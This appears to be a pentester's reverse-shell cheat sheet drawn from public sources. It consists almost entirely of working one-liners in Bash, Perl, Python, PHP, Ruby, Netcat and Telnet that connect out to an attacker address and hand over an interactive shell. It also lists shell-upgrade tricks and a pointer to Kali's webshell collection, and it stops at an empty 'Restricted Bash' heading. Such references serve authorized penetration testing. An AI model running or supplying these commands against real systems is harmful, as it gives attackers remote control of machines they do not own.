http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/

----------------
|Reverse Shells|
----------------

Bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Telnet:
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

Kali Linux Shell Directory (/usr/share/webshells):
php, perl, Coldfusion, ASP ASP, ASPX, JSP

-------------------------
|Spawn Interactive Shell|
-------------------------

#Python
python -c 'import pty; pty.spawn("/bin/sh")'

#Echo
echo "os.system('/bin/bash')"

#sh
/bin/sh -i

#Bash
/bin/bash -i

#Perl
perl -e 'exec "/bin/sh";'

#vi/vim
:!bash

-----------------
|Restricted Bash|
-----------------
